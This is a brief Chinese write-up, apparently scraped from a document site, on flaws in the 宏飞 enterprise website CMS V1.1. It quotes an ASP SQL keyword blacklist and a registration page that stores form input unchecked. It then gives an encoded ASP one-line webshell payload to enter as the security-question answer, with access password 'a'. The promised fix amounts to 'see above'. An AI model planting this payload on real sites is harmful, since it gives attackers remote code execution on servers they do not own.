宏飞企业网站管理系统V1.1漏洞及修复-电脑资料

宏飞企业网站管理系统V1.1漏洞及修复-电脑资料
is87_sql.asp
<%
Dim GetFlag Rem(提交方式)
Dim ErrorSql Rem(非法字符)
'..略
ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~tru ncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
ErrorSql = split(ErrorSql,"~")
'..略
If
Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<> 0 Then
response.write ""
'..略
response.write ""
'..略
%>
过滤问题，。

'\member\register_pass.asp
<%
dim
u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname, sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode ip=request.servervariables("remote_addr")
useradmin=replace(trim(request("useradmin")),"'","")
'..略
zsname=request.form("zsname")
'..略
rs("userpassword")=md5(request.form("userpassword"))
rs("zsname")=zsname
rs("sex")=sex
Response.Write ""
%>
直接写入数据库，
电脑资料
《宏飞企业网站管理系统V1.1 漏洞及修复》(https://)。

注册会员，密码保护答案：┼攠數畣整爠煥敵瑳∨≡┩>
密码：a
修复：见上文分析
摘自：
下载文档。